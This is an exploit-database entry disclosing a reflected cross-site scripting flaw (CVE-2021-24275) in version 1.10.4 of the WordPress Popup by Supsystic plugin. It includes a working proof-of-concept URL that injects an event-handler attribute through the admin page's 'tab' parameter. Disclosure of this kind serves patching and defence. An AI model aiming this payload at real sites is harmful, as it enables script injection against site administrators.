Lucene search

K
packetstorm0xB9PACKETSTORM:164311
HistorySep 28, 2021 - 12:00 a.m.

WordPress Popup 1.10.4 Cross Site Scripting

2021-09-2800:00:00
0xB9
packetstormsecurity.com
431
wordpress
popup
cross-site scripting
reflected
xss
cve-2021-24275

EPSS

0.002

Percentile

64.8%

`# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)  
# Date: 3/28/2021  
# Author: 0xB9  
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/  
# Version: 1.10.4  
# Tested on: Windows 10  
# CVE: CVE-2021-24275  
  
1. Description:  
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue  
  
2. Proof of Concept:  
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//  
`

EPSS

0.002

Percentile

64.8%